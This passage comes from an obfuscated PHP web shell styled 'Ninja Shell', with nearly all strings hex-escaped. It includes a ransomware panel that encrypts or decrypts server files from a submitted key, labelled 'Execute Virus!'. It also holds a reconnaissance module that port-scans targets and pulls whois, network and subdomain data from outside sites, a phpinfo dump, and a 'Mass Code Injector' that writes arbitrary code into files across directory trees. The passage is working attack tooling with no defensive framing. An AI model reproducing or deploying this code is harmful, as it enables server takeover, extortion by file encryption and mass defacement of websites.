"\x3c\x69\x20\143\x6c\x61\x73\163\75\42\146\141\40\x66\141\55\x75\x6e\x6c\x6f\143\153\x22\x20\141\162\x69\141\x2d\150\151\144\x64\x65\x6e\x3d\x22\164\162\165\145\x22\76\74\x2f\x69\x3e\40\74\146\x6f\x6e\164\40\143\x6f\x6c\157\x72\75\42\x23\106\x46\105\102\63\102\42\x3e\x55\x6e\154\157\143\153\x3c\x2f\x66\157\156\x74\x3e\40\50\74\x66\157\156\164\x20\143\157\x6c\x6f\162\x3d\42\x23\x34\x30\103\105\60\x38\x22\76\x53\x75\x63\143\145\x73\163\x3c\x2f\x66\x6f\x6e\164\x3e\51\x20\74\146\x6f\x6e\164\x20\x63\157\x6c\x6f\x72\75\42\43\x46\x46\71\x38\x30\60\42\x3e\x7c\x3c\57\x66\x6f\156\x74\x3e\x20\74\x66\x6f\156\164\x20\x63\157\x6c\x6f\162\x3d\42\x23\62\61\71\66\106\63\42\76" . $locate . "\74\57\x66\157\156\164\x3e\x20\x3c\x62\162\76"; } else { echo "\74\x69\x20\x63\154\x61\163\x73\75\x22\146\141\40\x66\x61\x2d\x75\x6e\154\x6f\143\153\x22\40\x61\x72\x69\x61\55\x68\151\x64\x64\x65\156\75\42\x74\162\x75\x65\x22\x3e\x3c\57\151\x3e\x20\74\146\157\156\164\40\x63\157\x6c\x6f\x72\x3d\42\x23\106\x46\x45\102\x33\x42\42\x3e\x55\156\154\x6f\143\x6b\74\57\146\157\156\x74\76\40\50\74\146\157\156\164\x20\x63\x6f\154\157\162\75\42\162\145\x64\x22\x3e\x46\141\x69\154\x65\x64\x3c\57\146\157\x6e\x74\76\x29\x20\74\146\157\156\x74\x20\x63\x6f\154\x6f\x72\x3d\x22\x23\x46\106\71\70\x30\x30\x22\x3e\174\x3c\57\x66\157\156\x74\x3e\40\74\146\x6f\156\164\x20\x63\157\x6c\x6f\x72\75\x22\x23\x32\x31\71\x36\x46\63\42\x3e" . $locate . "\x3c\57\x66\x6f\156\x74\x3e\x20\x3c\142\162\x3e"; } } public function kecuali($ext, $name) { $re = "\x2f\50{$name}\x29\57"; preg_match($re, $ext, $matches); if ($matches[1]) { return false; } return true; } } if ($_POST["\163\165\x62\155\151\x74"]) { switch ($_POST["\x6d\x65\164\150\x6f\144"]) { case "\x31": deRanSomeware::shcdirs(deRanSomeware::locate(), "\x31", $_POST["\x6b\x65\171"]); break; case "\62": deRanSomeware::shcdirs(deRanSomeware::locate(), "\x32", $_POST["\153\145\x79"]); break; } } else { ?>
<div class="item">
<center>
<pre>
<font color = "lime"><i>
______ _ _______ ___ _ _____
| ____| (_) |__ __| / _ \ (_) | __ \
| |__ __ __ ___ _ __ ___ _ ___ _ __ ___ | | _ __ | | | | _ __ _ _ __ | |__) | __ _ _ __ ___ ___ _ __ ___ __ __ __ _ _ __ ___
| __| \ \/ // _ \ | '__|/ __|| |/ __|| '_ ` _ \ | || '__|| | | || | / _` || '_ \ | _ / / _` || '_ \ / __| / _ \ | '_ ` _ \\ \ /\ / // _` || '__|/ _ \
| |____ > <| (_) || | | (__ | |\__ \| | | | | | || | | |_| || || (_| || | | | | | \ \| (_| || | | |\__ \| (_) || | | | | |\ V V /| (_| || | | __/
|______|/_/\_\\___/ |_| \___||_||___/|_| |_| |_| |_||_| \___/ | | \__,_||_| |_| |_| \_\\__,_||_| |_||___/ \___/ |_| |_| |_| \_/\_/ \__,_||_| \___|
/ |
|__/
</i>
. .
.n . . n.
. .dP dP 9b 9b. .
4 qXb . dX Xb . dXp t
dX. 9Xb .dXb __ __ dXb. dXP .Xb
9XXb._ _.dXXXXb dXXXXbo. .odXXXXb dXXXXb._ _.dXXP
9XXXXXXXXXXXXXXXXXXXVXXXXXXXXOo. .oOXXXXXXXXVXXXXXXXXXXXXXXXXXXXP
`9XXXXXXXXXXXXXXXXXXXXX'~ ~`OOO8b d8OOO'~ ~`XXXXXXXXXXXXXXXXXXXXXP'
`9XXXXXXXXXXXP' `9XX' `98v8P' `XXP' `9XXXXXXXXXXXP'
~~~~~~~ 9X. .db|db. .XP ~~~~~~~
)b. .dbo.dP'`v'`9b.odb. .dX(
,dXXXXXXXXXXXb dXXXXXXXXXXXb.
dXXXXXXXXXXXP' . `9XXXXXXXXXXXb
dXXXXXXXXXXXXb d|b dXXXXXXXXXXXXb
9XXb' `XXXXXb.dX|Xb.dXXXXX' `dXXP
`' 9XXXXXX( )XXXXXXP `'
XXXX X.`v'.X XXXX
XP^X'`b d'`X^XX
X. 9 ` ' P )X
`b ` ' d'
` '
-[ Contact : [email protected] ]-
System : <?php echo php_uname() . "\12"; ?>
Server : <?php $_SERVER["\x48\124\124\x50\x5f\x48\x4f\x53\124"] . "\xa"; ?>
#Ransomware Ini Berada Pada [dir]: <?php echo getcwd(); ?>
/<?php $current_file_name = basename($_SERVER["\x50\110\120\x5f\x53\105\114\x46"]); echo $current_file_name . "\xa"; ?>
</font>
</pre>
<h2>
<font color='red' face='iceland'> Put Your Encryption/Decryption Key Here
</h2>
</font>
<form action="" method="post" style=" text-align: center;">
<input type="text" name="key" class="inpute" placeholder="KEY ENC/DEC"><br><br>
<h2>
<font color='lime' face='iceland'> Post Type :
</h2>
</font>
<select name="method" class="selecte">
<option value="1">Encrypt Files!</option>
<option value="2">Decrypt Files!</option>
</select><br><br><br><br><br>
<input type="submit" name="submit" class="submite" value="Execute Virus!" />
</form>
<?php } ?>
</center>
</div>
</body>
</html>
<br>
<hr>
<?php } elseif (isset($_GET[hex("\x77\150\x6f\151\163")])) { $dir = path(); ?>
<form method="post">
<?php @set_time_limit(0); @error_reporting(0); function sws_domain_info($site) { $getip = @file_get_contents("\150\x74\x74\x70\x3a\x2f\x2f\x6e\x65\x74\167\157\x72\x6b\x74\x6f\157\154\x73\56\156\154\57\x77\x68\157\151\163\57{$site}"); flush(); $ip = @findit($getip, "\74\x70\162\x65\x3e", "\x3c\57\160\x72\145\x3e"); return $ip; flush(); } function sws_net_info($site) { $getip = @file_get_contents("\150\164\164\x70\x3a\x2f\x2f\x6e\x65\164\167\157\162\x6b\x74\x6f\x6f\154\x73\56\156\x6c\57\141\163\x69\156\x66\157\x2f{$site}"); $ip = @findit($getip, "\74\160\162\x65\76", "\74\57\x70\x72\x65\x3e"); return $ip; flush(); } function sws_site_ser($site) { $getip = @file_get_contents("\150\x74\x74\160\72\57\57\156\145\x74\167\157\162\153\x74\x6f\157\154\163\x2e\x6e\154\57\x72\145\166\x65\162\x73\x65\151\160\57{$site}"); $ip = @findit($getip, "\x3c\x70\162\145\76", "\x3c\x2f\160\x72\145\x3e"); return $ip; flush(); } function sws_sup_dom($site) { $getip = @file_get_contents("\x68\164\x74\160\x3a\57\57\167\167\167\x2e\155\141\147\x69\143\x2d\x6e\x65\164\56\151\156\x66\157\57\144\x6e\x73\55\x61\x6e\144\x2d\x69\160\x2d\164\x6f\x6f\x6c\163\56\144\x6e\163\x6c\157\157\153\x75\160\77\x73\x75\x62\x64\75" . $site . "\x26\x53\145\141\162\143\150\x2b\x73\x75\x62\x64\157\155\x61\x69\156\x73\75\x46\x69\156\144\53\163\x75\142\144\x6f\x6d\x61\x69\156\x73"); $ip = @findit($getip, "\x3c\163\x74\162\157\x6e\x67\76\116\x61\x6d\x65\163\x65\162\166\145\x72\163\40\x66\157\x75\156\x64\72\74\x2f\163\164\x72\157\x6e\x67\x3e", "\x3c\163\143\x72\x69\160\x74\x20\164\x79\x70\145\75\42\164\145\170\x74\57\152\x61\166\x61\163\143\x72\151\160\x74\x22\76"); return $ip; flush(); } function sws_port_scan($ip) { $list_post = array("\70\60", "\x32\61", "\62\62", "\x32\60\70\x32", "\x32\65", "\65\x33", "\61\61\x30", "\64\64\x33", "\x31\64\x33"); foreach ($list_post as $o_port) { $connect = @fsockopen($ip, $o_port, $errno, $errstr, 5); if ($connect) { echo "\x20{$ip}\x20\x3a\40{$o_port}\40\77\77\77\40\74\x75\x20\x73\164\x79\x6c\145\x3d\x22\x63\x6f\154\157\162\x3a\40\x77\x68\151\164\x65\x22\76\117\160\x65\x6e\x3c\57\165\x3e\40\x3c\x62\162\40\x2f\76\74\142\x72\40\57\x3e"; flush(); } } } function findit($mytext, $starttag, $endtag) { $posLeft = @stripos($mytext, $starttag) + strlen($starttag); $posRight = @stripos($mytext, $endtag, $posLeft + 1); return @substr($mytext, $posLeft, $posRight - $posLeft); flush(); } echo "\74\142\162\x3e\74\x62\162\76\x3c\x63\x65\156\164\x65\162\x3e"; echo "\xa\40\40\40\x20\74\x62\162\x20\57\x3e\74\x68\x72\76\12\x9\74\x64\151\x76\40\x63\154\x61\x73\163\75\42\155\171\142\x6f\x78\42\76\12\x9\74\150\62\x3e\127\x68\x6f\x69\x73\40\x4e\x69\156\152\x61\x20\x53\x68\145\x6c\x6c\74\57\x68\x32\76\xa\11\x3c\146\157\162\x6d\x20\155\x65\164\150\x6f\x64\75\x22\x70\157\163\x74\42\76\x3c\x74\x61\x62\x6c\145\40\143\x6c\141\x73\163\75\x22\x74\141\142\x6e\145\164\x22\x3e\xa\x20\x20\40\40\74\x74\162\76\x3c\x74\144\76\x53\x69\x74\x65\40\164\x6f\40\163\x63\141\156\x20\74\x2f\x74\144\x3e\74\x74\144\x3e\72\x3c\57\164\144\x3e\74\x74\144\76\12\40\x20\x20\x20\x3c\x69\x6e\x70\165\164\x20\164\171\x70\x65\75\42\x74\145\170\164\x22\40\156\141\x6d\145\75\42\163\151\x74\x65\42\x20\163\151\x7a\145\x3d\42\65\x30\42\x20\x73\164\171\x6c\145\x3d\42\143\x6f\154\157\162\72\x62\x6c\x61\x63\x6b\x3b\x62\141\143\153\x67\162\157\165\x6e\x64\55\x63\x6f\154\157\162\x3a\x23\106\x46\106\x22\40\143\x6c\141\x73\163\75\x22\146\x6f\162\x6d\55\x63\157\x6e\x74\162\x6f\x6c\42\x20\x76\141\x6c\165\x65\x3d\42\x73\151\164\x65\x2e\x63\157\155\42\x20\x2f\x3e\40\46\x6e\142\163\x70\40\74\x69\156\160\165\x74\x20\x63\154\141\163\x73\75\42\146\x6f\162\x6d\x2d\143\157\x6e\164\x72\x6f\x6c\42\x20\164\171\160\x65\75\42\163\165\x62\155\x69\x74\42\x20\163\x74\x79\154\x65\75\42\143\x6f\154\x6f\x72\x3a\x62\x6c\x61\143\153\73\x62\141\x63\153\x67\x72\x6f\x75\x6e\144\55\143\157\154\157\162\x3a\43\106\x46\106\x22\40\x6e\x61\155\x65\75\x22\x73\x63\x61\x6e\x22\40\166\x61\x6c\x75\145\75\x22\x53\x63\x61\156\40\41\42\x20\57\x3e\74\x2f\164\x64\76\x3c\57\164\162\76\12\40\x20\x20\x20\74\57\x74\141\x62\x6c\x65\x3e\x3c\57\146\157\162\x6d\x3e\x3c\57\x64\x69\166\x3e\74\x68\162\x3e\74\142\162\x3e"; if (isset($_POST["\x73\x63\x61\x6e"])) { $site = @htmlentities($_POST["\x73\151\x74\x65"]); if (empty($site)) { die("\x3c\142\162\40\57\x3e\74\x62\162\40\x2f\x3e\x20\x4e\x6f\164\40\141\144\x64\x20\111\x50\x20\56\x2e\x20\x21"); } $ip_port = @gethostbyname($site); echo "\12\x20\40\x20\74\142\x72\40\x2f\x3e\x3c\144\151\x76\40\143\154\x61\x73\163\75\x22\163\143\62\x22\x3e\x53\x63\x61\x6e\x6e\151\156\x67\40\x5b\40{$site}\40\151\x70\x20{$ip_port}\x20\x5d\40\x2e\56\x2e\x20\74\57\x64\151\x76\x3e\12\x20\40\40\74\x64\151\x76\x20\x63\x6c\x61\163\x73\75\42\164\x69\x74\x22\76\x20\74\142\x72\x20\57\x3e\74\x62\162\x20\57\76\174\55\x2d\55\x2d\x2d\x2d\x2d\x2d\55\x2d\x2d\55\55\x2d\x20\x50\157\162\164\x20\x53\145\x72\x76\145\162\x20\55\55\55\x2d\55\55\x2d\x2d\x2d\x2d\x2d\55\x2d\55\x2d\x2d\55\x2d\x7c\x20\74\x62\162\40\57\x3e\74\57\x64\x69\166\76\xa\x20\40\x20\74\144\151\166\x20\x63\154\141\x73\163\75\42\x72\165\x22\76\x20\x3c\142\x72\x20\x2f\76\x3c\x62\x72\x20\57\x3e\74\x70\162\x65\x3e\12\40\x20\40"; echo '' . sws_port_scan($ip_port) . "\40\74\57\160\x72\145\76\x3c\x2f\x64\151\x76\x3e\x20"; flush(); echo "\74\144\151\x76\x20\x63\154\141\163\x73\75\x22\164\151\x74\x22\x3e\x3c\142\162\x20\57\76\x3c\142\162\x20\x2f\x3e\174\55\x2d\x2d\x2d\55\55\55\55\x2d\x2d\x2d\x2d\x2d\x2d\x20\104\157\x6d\x61\151\156\40\x49\156\x66\x6f\x20\55\55\x2d\55\55\x2d\55\x2d\55\55\55\x2d\55\55\x2d\55\x2d\55\174\40\74\142\x72\x20\x2f\x3e\x20\74\57\x64\151\166\x3e\12\40\40\40\74\144\x69\x76\x20\143\154\141\163\163\x3d\42\162\x75\x22\76\12\40\40\40\74\x70\162\x65\x3e" . sws_domain_info($site) . "\x3c\57\x70\162\x65\76\x3c\x2f\x64\x69\166\76"; flush(); echo "\12\40\x20\40\74\x64\151\x76\40\x63\154\x61\163\x73\x3d\42\x74\151\x74\x22\x3e\x20\74\142\162\x20\57\76\74\142\162\40\x2f\x3e\x7c\x2d\55\55\55\x2d\x2d\55\x2d\x2d\55\55\x2d\55\x2d\x20\116\x65\x74\167\x6f\x72\x6b\40\111\x6e\x66\157\x20\55\x2d\x2d\x2d\55\x2d\x2d\55\55\55\x2d\55\x2d\55\x2d\x2d\55\x2d\174\40\74\x62\162\x20\x2f\x3e\74\x2f\144\x69\166\76\12\x20\x20\40\x3c\144\151\166\40\x63\154\141\163\163\x3d\x22\162\x75\x22\76\12\40\x20\40\x3c\x70\162\145\76" . sws_net_info($site) . "\x3c\57\x70\162\x65\x3e\40\74\57\x64\x69\166\76"; flush(); echo "\x3c\144\151\x76\x20\x63\x6c\141\163\x73\75\42\x74\151\x74\42\76\40\74\142\x72\x20\x2f\76\74\142\162\40\57\x3e\174\x2d\55\55\55\55\55\55\55\x2d\x2d\x2d\55\x2d\55\x20\163\165\142\144\x6f\x6d\x61\151\156\x73\x20\123\x65\x72\x76\x65\x72\40\x2d\55\x2d\x2d\x2d\55\x2d\x2d\x2d\x2d\x2d\55\55\55\55\55\x2d\x2d\x7c\x20\74\142\162\40\57\x3e\x3c\x2f\144\x69\x76\76\12\x20\x20\x20\x3c\144\151\x76\x20\143\154\141\163\x73\75\42\162\165\x22\x3e\xa\x20\40\40\74\160\162\x65\76" . sws_sup_dom($site) . "\x3c\x2f\160\x72\x65\x3e\40\x3c\57\x64\x69\166\x3e"; flush(); echo "\x3c\x64\151\x76\x20\x63\x6c\141\x73\x73\x3d\x22\x74\x69\164\42\x3e\x20\74\142\x72\40\x2f\76\x3c\142\162\x20\x2f\x3e\x7c\x2d\55\x2d\x2d\55\55\55\55\x2d\55\55\55\x2d\55\x20\x53\x69\x74\145\x20\123\x65\x72\x76\145\162\x20\55\x2d\55\55\55\x2d\55\x2d\55\55\x2d\55\55\55\x2d\x2d\x2d\55\x7c\x20\74\x62\162\x20\x2f\x3e\74\x2f\x64\x69\x76\x3e\xa\40\40\x20\x3c\144\151\x76\40\x63\154\141\163\163\x3d\x22\162\165\x22\76\xa\40\x20\40\74\160\162\x65\76" . sws_site_ser($site) . "\x3c\57\x70\162\145\76\x20\74\57\x64\x69\x76\76\xa\x20\x20\40\x3c\144\x69\x76\x20\143\154\x61\163\x73\x3d\x22\x74\151\x74\x22\76\x20\x3c\142\162\x20\57\x3e\x3c\x62\162\x20\x2f\76\x7c\x2d\55\x2d\55\x2d\55\55\x2d\x2d\x2d\55\55\55\55\x20\x45\x4e\x44\x20\x2d\x2d\55\x2d\55\x2d\x2d\55\x2d\55\55\x2d\55\x2d\x2d\x2d\x2d\55\174\x20\74\x62\x72\x20\x2f\x3e\x3c\x2f\144\151\166\x3e"; flush(); } echo "\74\x2f\143\145\x6e\164\145\x72\76"; } elseif (isset($_GET[hex("\160\150\x70\151\156\x66\x6f")])) { echo "\x3c\150\x72\x3e\x3c\142\162\x3e\74\x63\x65\x6e\x74\x65\x72\x3e"; echo "\74\150\62\76\x53\x65\x72\166\145\x72\x20\x50\x68\x70\40\x49\156\146\157\74\57\x68\x32\x3e"; echo phpinfo(); echo "\74\x68\x72\76\x3c\x62\162\76\74\x2f\x63\145\x6e\x74\x65\162\76"; } elseif (isset($_GET[hex("\x69\156\152\x65\x63\x74\55\x63\157\144\x65")])) { echo "\x3c\150\x72\76\74\x62\x72\76"; echo "\x3c\143\145\156\164\145\x72\76\x3c\x68\62\x3e\115\141\x73\x73\40\103\x6f\144\145\x20\x49\156\152\145\143\164\x6f\x72\x20\116\151\156\x6a\x61\x20\x53\x68\145\154\x6c\74\x2f\150\x32\76\x3c\x2f\x63\145\x6e\164\145\162\76"; if (stristr(php_uname(), "\127\x69\156\x64\x6f\x77\x73")) { $DS = "\134"; } else { if (stristr(php_uname(), "\114\151\x6e\x75\x78")) { $DS = "\x2f"; } } function get_structure($path, $depth) { global $DS; $res = array(); if (in_array(0, $depth)) { $res[] = $path; } if (in_array(1, $depth) or in_array(2, $depth) or in_array(3, $depth)) { $tmp1 = glob($path . $DS . "\x2a", GLOB_ONLYDIR); if (in_array(1, $depth)) { $res = array_merge($res, $tmp1); } } if (in_array(2, $depth) or in_array(3, $depth)) { $tmp2 = array(); foreach ($tmp1 as $t) { $tp2 = glob($t . $DS . "\52", GLOB_ONLYDIR); $tmp2 = array_merge($tmp2, $tp2); } if (in_array(2, $depth)) { $res = array_merge($res, $tmp2); } } if (in_array(3, $depth)) { $tmp3 = array(); foreach ($tmp2 as $t) { $tp3 = glob($t . $DS . "\52", GLOB_ONLYDIR); $tmp3 = array_merge($tmp3, $tp3); } $res = array_merge($res, $tmp3); } return $res; } if (isset($_POST["\x73\x75\x62\155\x69\164"]) && $_POST["\163\x75\142\x6d\151\x74"] == "\x49\156\152\145\x63\164") { $name = $_POST["\x6e\x61\x6d\x65"] ? $_POST["\156\x61\x6d\x65"] : "\x2a"; $type = $_POST["\x74\x79\x70\145"] ? $_POST["\x74\x79\160\x65"] : "\x68\x74\x6d\154"; $path = $_POST["\x70\x61\164\x68"] ? $_POST["\x70\x61\164\150"] : getcwd(); $code = $_POST["\x63\x6f\x64\145"] ? $_POST["\x63\x6f\144\145"] : "\x50\x61\153\151\x73\164\x61\x6e\x20\x48\141\x78\x6f\162\163\x20\x43\x72\x65\x77"; $mode = $_POST["\155\157\144\x65"] ? $_POST["\x6d\x6f\144\x65"] : "\x61"; $depth = sizeof($_POST["\144\145\x70\x74\150"]) ? $_POST["\144\x65\x70\164\150"] : array("\x30"); $dt = get_structure($path, $depth); foreach ($dt as $d) { if ($mode == "\141") { if (file_put_contents($d . $DS . $name . "\x2e" . $type, $code, FILE_APPEND)) { echo "\x3c\x64\151\x76\76\x3c\163\164\162\157\156\x67\x3e" . $d . $DS . $name . "\x2e" . $type . "\x3c\x2f\x73\164\162\x6f\156\147\x3e\x3c\x73\x70\141\x6e\x20\x73\164\171\x6c\x65\75\x22\143\x6f\154\x6f\x72\x3a\154\151\x6d\x65\x3b\42\x3e\40\x77\141\163\40\151\x6e\x6a\145\x63\164\x65\x64\74\57\163\160\x61\x6e\76\74\57\x64\x69\x76\x3e"; } else { echo "\x3c\x64\x69\x76\x3e\x3c\163\160\141\x6e\40\x73\x74\171\x6c\x65\75\42\143\157\154\x6f\162\x3a\x72\145\x64\x3b\x22\76\x66\x61\151\x6c\145\x64\40\164\157\40\151\x6e\x6a\145\x63\x74\x3c\x2f\163\160\x61\x6e\76\40\74\163\164\162\157\x6e\x67\76" . $d . $DS . $name . "\56" . $type . "\74\57\x73\164\x72\x6f\156\x67\x3e\74\57\144\151\x76\x3e"; } } else { if (file_put_contents($d . $DS . $name . "\x2e" . $type, $code)) { echo "\74\x64\151\x76\76\x3c\x73\164\162\x6f\x6e\147\76" . $d . $DS . $name . "\x2e" . $type . "\x3c\57\163\164\162\157\156\147\76\74\163\x70\x61\x6e\x20\x73\164\171\x6c\145\x3d\x22\x63\x6f\x6c\157\162\72\154\x69\155\x65\x3b\42\x3e\x20\x77\141\x73\x20\151\156\152\145\x63\164\145\144\x3c\x2f\x73\x70\141\x6e\x3e\x3c\57\144\151\166\x3e"; } else { echo "\x3c\144\151\166\76\74\163\160\141\156\x20\163\164\171\154\145\x3d\x22\143\x6f\x6c\157\x72\72\x72\x65\144\73\x22\76\x66\x61\151\154\145\144\40\164\x6f\x20\x69\x6e\x6a\x65\x63\x74\x3c\57\163\x70\141\x6e\x3e\40\x3c\163\164\162\157\156\x67\x3e" . $d . $DS . $name . "\x2e" . $type . "\74\57\163\164\x72\x6f\156\x67\76\74\x2f\144\151\166\76"; } } } } else { echo "\74\x66\157\162\155\x20\155\145\164\x68\x6f\x64\x3d\42\160\x6f\163\x74\x22\40\141\x63\x74\x69\x6f\156\75\x22\x22\76\12\x20\x20\40\x20\x20\x20\x20\x20\74\143\145\156\164\145\x72\x3e\12\x20\x20\x20\40\40\x20\40\x20\40\40\40\x20\40\40\40\x20\x3c\x74\x61\142\x6c\x65\x20\141\154\x69\x67\156\x3d\x22\143\x65\156\x74\145\x72\x22\x3e\12\40\x20\40\x20\40\40\x20\x20\40\x20\40\40\40\x20\40\40\x20\x20\40\40\74\164\x72\x3e\x3c\142\162\76\xa\x20\40\x20\x20\x20\40\x20\x20\40\40\x20\x20\x20\40\x20\x20\x20\x20\x20\40\40\40\x20\40\74\164\x64\x3e\x44\x69\x72\x65\x63\x74\157\162\171\x20\72\x20\74\57\164\x64\x3e\xa\x20\x20\x20\40\40\x20\40\x20\40\40\x20\40\x20\40\40\x20\40\x20\40\40\x20\x20\40\x20\74\164\x64\x3e\x3c\x69\156\160\x75\x74\x20\x63\x6c\x61\x73\x73\40\75\40\x22\146\157\x72\155\55\x63\157\156\x74\162\157\x6c\x22\x20\164\171\x70\145\40\x3d\40\x22\164\x65\170\164\42\x20\143\154\x61\163\163\x3d\42\142\157\170\42\40\156\141\155\145\x3d\x22\x70\141\164\x68\x22\x20\166\141\154\x75\x65\75\x22" . getcwd() . "\x22\x20\x73\151\172\x65\75\42\x35\x30\42\x2f\76\74\x2f\x74\144\76\12\40\40\x20\x20\40\x20\x20\40\40\40\40\40\x20\40\40\x20\x20\x20\x20\40\74\x2f\164\x72\x3e\12\40\40\40\x20\x20\x20\40\x20\40\40\40\40\x20\x20\x20\40\40\x20\x20\x20\x3c\164\x72\76\12\x20\40\x20\40\x20\x20\x20\40\x20\40\40\40\x20\40\x20\40\x20\40\40\x20\x20\40\x20\40\x3c\x74\144\40\x63\x6c\x61\163\163\75\42\x74\151\x74\x6c\x65\42\76\x4d\157\144\145\40\72\40\74\57\164\x64\x3e\12\40\x20\x20\40\x20\x20\x20\x20\x20\x20\40\40\x20\40\40\40\40\40\x20\x20\40\x20\x20\x20\x3c\x74\144\x3e\xa\x20\40\x20\x20\40\x20\40\x20\40\x20\40\x20\x20\40\x20\40\x20\x20\x20\40\x20\x20\40\x20\x20\x20\40\40\x3c\x73\x65\x6c\x65\143\164\40\143\154\141\163\x73\40\x3d\40\x22\x66\x6f\162\155\x2d\x63\x6f\x6e\x74\162\x6f\x6c\x22\x20\x73\164\171\x6c\145\x3d\42\x77\151\144\x74\150\72\x20\61\65\x30\160\170\x3b\x22\x20\x6e\141\x6d\x65\75\x22\x6d\x6f\144\145\x22\40\x63\154\x61\163\x73\75\42\x62\x6f\170\42\76\xa\x20\x20\40\40\40\40\x20\40\x20\40\40\x20\40\x20\x20\x20\40\40\40\40\40\40\40\40\40\40\40\x20\x20\x20\40\x20\74\157\160\x74\151\157\156\40\166\x61\154\x75\145\x3d\42\141\x22\x3e\101\160\x65\x6e\x64\145\x72\x3c\57\x6f\x70\164\151\157\x6e\x3e\xa\x20\40\40\40\40\x20\40\x20\x20\x20\x20\40\40\x20\x20\x20\40\x20\40\40\40\40\40\x20\40\40\x20\x20\40\x20\x20\40\74\157\x70\164\151\157\156\x20\x76\141\154\165\145\75\x22\167\x22\76\117\x76\145\x72\167\x72\151\164\x65\162\x3c\57\157\x70\164\x69\x6f\156\76\xa\40\40\x20\x20\x20\x20\x20\40\40\x20\40\x20\x20\x20\x20\40\x20\40\x20\40\40\x20\x20\x20\x20\x20\40\40\74\57\163\145\x6c\x65\x63\x74\x3e\12\x20\x20\40\40\40\x20\40\x20\x20\40\x20\x20\40\x20\x20\x20\40\40\x20\x20\x20\x20\40\40\x3c\57\x74\144\x3e\12\40\40\x20\x20\x20\x20\40\40\40\40\40\x20\x20\40\x20\40\x20\40\x20\40\74\x2f\x74\x72\76\12\x20\40\40\40\x20\x20\x20\x20\x20\40\x20\x20\x20\40\40\x20\x20\40\x20\40\74\164\x72\76\xa\40\x20\x20\40\40\x20\x20\x20\40\40\x20\x20\40\40\x20\x20\x20\40\x20\x20\x20\40\x20\x20\x3c\164\144\40\143\x6c\141\x73\x73\x3d\x22\x74\151\x74\x6c\145\x22\76\x46\x69\x6c\x65\40\116\x61\x6d\x65\x20\46\40\x54\x79\x70\145\40\x3a\40\74\57\x74\144\x3e\12\x20\40\40\x20\x20\x20\40\x20\x20\x20\40\40\40\40\40\x20\x20\x20\x20\40\40\x20\40\40\74\164\144\76\x3c\142\162\76\12\40\40\x20\x20\40\x20\40\40\40\40\40\40\40\40\x20\x20\x20\40\x20\40\40\40\x20\40\40\40\x20\x20\74\x69\156\x70\x75\x74\x20\143\154\141\163\x73\40\75\40\x22\146\157\x72\x6d\x2d\x63\157\156\164\162\x6f\x6c\42\40\x74\171\x70\x65\x3d\x22\164\x65\170\164\x22\40\163\164\x79\x6c\145\75\42\167\x69\144\164\x68\x3a\40\x31\x30\60\x70\x78\x3b\42\x20\156\x61\155\x65\x3d\42\156\x61\x6d\x65\42\x20\x76\x61\154\165\x65\x3d\x22\x2a\x22\x2f\76\x26\x6e\x62\x73\x70\x3b\x26\x6e\x62\163\160\x3b\12\40\x20\40\x20\x20\40\40\40\40\x20\40\40\40\x20\x20\x20\x20\40\40\40\x20\40\x20\x20\40\xa\x20\40\40\x20\x20\40\40\x20\40\40\x20\x20\x20\x20\40\40\40\x20\40\40\40\x20\40\x20\x20\40\x20\40\74\x73\x65\154\145\x63\x74\40\143\154\141\x73\x73\x20\75\40\x22\x66\x6f\x72\155\x2d\x63\x6f\x6e\164\x72\x6f\x6c\x22\x20\x73\x74\171\x6c\x65\75\x22\167\x69\x64\x74\x68\72\40\x31\65\60\x70\170\73\x22\40\x6e\141\x6d\x65\75\x22\164\x79\x70\145\42\40\x63\154\x61\x73\163\x3d\x22\x62\157\x78\x22\x3e\xa\40\40\40\x20\40\x20\40\40\40\40\x20\x20\40\x20\40\40\x20\40\40\x20\40\x20\40\40\x20\x20\40\40\x3c\x6f\x70\164\x69\x6f\x6e\x20\166\141\x6c\x75\145\x3d\x22\x68\x74\155\154\x22\x3e\110\x54\115\x4c\x3c\x2f\157\x70\x74\x69\x6f\156\x3e\12\40\40\40\x20\40\x20\40\40\40\x20\40\40\40\x20\x20\x20\40\40\x20\40\40\x20\40\40\x20\x20\x20\x20\74\x6f\160\x74\x69\x6f\156\40\x76\141\x6c\165\145\x3d\42\x68\164\x6d\42\x3e\x48\x54\115\74\x2f\x6f\160\x74\151\157\x6e\76\12\x20\x20\40\40\x20\40\x20\x20\40\x20\x20\x20\x20\40\40\x20\x20\x20\40\x20\40\40\40\40\x20\40\40\x20\74\157\160\164\151\157\x6e\x20\x76\x61\x6c\x75\x65\x3d\x22\160\150\160\42\x20\x73\x65\x6c\145\x63\164\x65\x64\x3d\x22\x73\x65\x6c\x65\x63\164\x65\x64\42\76\120\110\x50\74\x2f\x6f\160\164\151\x6f\156\76\xa\x20\40\x20\40\x20\x20\40\x20\x20\x20\40\x20\x20\x20\40\40\x20\x20\40\x20\40\x20\40\x20\40\40\40\40\74\x6f\160\x74\151\157\x6e\x20\166\x61\154\165\x65\75\x22\141\x73\x70\x22\76\x41\x53\120\x3c\57\x6f\160\164\x69\x6f\156\76\12\40\40\40\x20\40\40\40\40\40\40\40\x20\x20\40\40\x20\x20\40\40\x20\40\40\x20\x20\x20\40\40\40\x3c\x6f\x70\x74\x69\157\156\x20\x76\141\154\165\x65\75\42\141\163\x70\170\42\76\101\123\120\x58\x3c\x2f\157\x70\164\151\157\x6e\76\xa\40\40\40\40\x20\40\40\x20\40\40\40\40\x20\40\40\40\x20\40\x20\x20\40\x20\40\x20\40\40\x20\x20\x3c\157\x70\x74\151\x6f\156\40\166\x61\x6c\165\145\x3d\42\170\x6d\154\x22\76\130\115\114\74\57\157\160\164\151\157\x6e\x3e\12\x20\x20\40\x20\x20\40\40\40\40\40\x20\40\x20\40\40\x20\x20\40\40\40\x20\x20\40\x20\x20\40\40\40\74\157\x70\x74\151\157\156\x20\x76\x61\154\165\x65\x3d\42\x74\x78\164\x22\x3e\124\x58\124\x3c\57\x6f\x70\x74\x69\157\x6e\76\xa\x20\40\x20\40\40\x20\x20\x20\40\40\x20\40\x20\40\x20\x20\40\40\40\40\40\40\40\x20\74\x2f\163\x65\x6c\145\143\164\76\x3c\57\x74\144\76\12\x20\40\x20\x20\x20\x20\40\x20\40\40\40\40\x20\40\x20\40\40\x20\x20\x20\74\57\x74\x72\76\xa\x20\40\x20\x20\x20\x20\40\40\40\40\x20\40\x20\x20\x20\40\x20\x20\x20\x20\x3c\164\x72\x3e\12\x20\x20\40\40\40\40\x20\x20\x20\40\40\x20\40\40\40\x20\x20\40\40\x20\40\40\40\40\74\164\x64\x20\x63\154\141\x73\x73\x3d\x22\x74\x69\x74\154\x65\x22\76\x43\x6f\144\x65\40\111\x6e\152\x65\x63\164\